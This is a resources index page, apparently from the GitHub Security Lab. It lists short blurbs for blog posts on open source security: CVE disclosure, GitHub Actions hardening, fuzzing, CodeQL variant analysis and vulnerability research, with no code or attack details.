Resources
Open Source Community
Enable, with just a few clicks, and for free, GitHub's security tools that will help you write secure code, prevent secret leaks, scan your dependencies for security vulnerabilities, and globally keep your users safe.
The GitHub Security Lab audits open source projects and helps maintainers fix security vulnerabilities. For our 500th CVE, we took a trip down memory lane with a review of some noteworthy CVEs!
The GitHub Security Lab provided office hours for open source projects looking to improve their security posture. Here’s what we learned and how you can also participate.
Do you worry that a CVE will hurt the reputation of your project? In reality, CVEs are a tracking number for security vulnerabilities, and nothing more. Here’s how we think of them at GitHub.
Vulnerability reporters play an important role for open source security. Read our recommended process and suggestions for vulnerability disclosure to foster a positive experience.
In this series about hardening the security of the Exiv2 project, we'll share tips that will help you harden the security of your own project.
By referencing an external action with the uses directive, you’re running third-party code and giving it access to computing time, secrets, and your repository token.
Every GitHub Actions workflow trigger comes with a GitHub context. Some of this data might be attacker controlled and should be treated as potentially untrusted input.
Combining the pull_request_target workflow trigger with an explicit checkout of an untrusted Pull Request is a dangerous practice that may lead to repository compromise.
An overview of 2021's most common types of software vulnerabilities, based on an analysis of GitHub's Advisory Database.
Run through and lessons learned of our second episode of LiveQL, where we live-coded CodeQL queries to find a Rhino/Nashorn script injection.
Man Yue Mo built and open sourced a fuzzer for the Android Near Field Communication (NFC) component. He shares here some design considerations when building the fuzzer.
Man Yue Mo goes through a series of UAF security vulnerabilities in Web Audio in Chrome and explains how to trigger them by arranging the order of various events.
When his prank was thwarted by COVID-19, Kevin Backhouse decided to write a glibc heap exploitation tutorial instead. Learners, you're in luck, enter the House of Force!
Antonio Morales continues his journey on socket-based fuzzing, with FreeRDP, and shares his process from start to finish, and the 12 bugs found as a result. Let's fuzz!
Antonio shares findings and tips from his research on socket-based fuzzing. Let's start with the audit of three widely-used FTP servers, with details on interesting CVEs found along the way.
Read our beginner's exploration of encryption, focused on identity validation issues in TLS. Utilizing CodeQL, we uncover common pitfalls in hostname validation across various projects.
When Kevin Backhouse became a contributor to the Exiv2 project, he discovered, from the other side, the burden of never-ending fuzzing reports. How to escape from the fuzzing police?
Let's dive into advanced fuzzing concepts: sanitizers, feedback-guided fuzzing, structure-aware fuzzing, custom mutators, and uncovering logical bugs with fuzzing.
Based on our security audit of VLC Media Player, we share some common fuzzing challenges, and practical ways to address them. Read on to discover a variety of fuzzing strategies.
Let's build on each other's work. By analyzing past Chromium IPC vulnerabilities, Man Yue Mo found 6 new CVEs, and gave back to the community with a set of CodeQL libraries for Chromium.
Large and unknown codebases can be daunting to approach. Read our experience with Rsyslog, leveraging CodeQL from threat modeling to variant analysis, to disclose three CVEs.
Work smarter! In this research, we explore a vulnerability in the Linux Kernel, and with CodeQL's variant analysis, we found two more, triggered remotely through the WiFi network.
We analyzed past Android deserialization security vulnerabilities and used our SAST CodeQL to easily find, with just one query, the classes responsible for those bugs.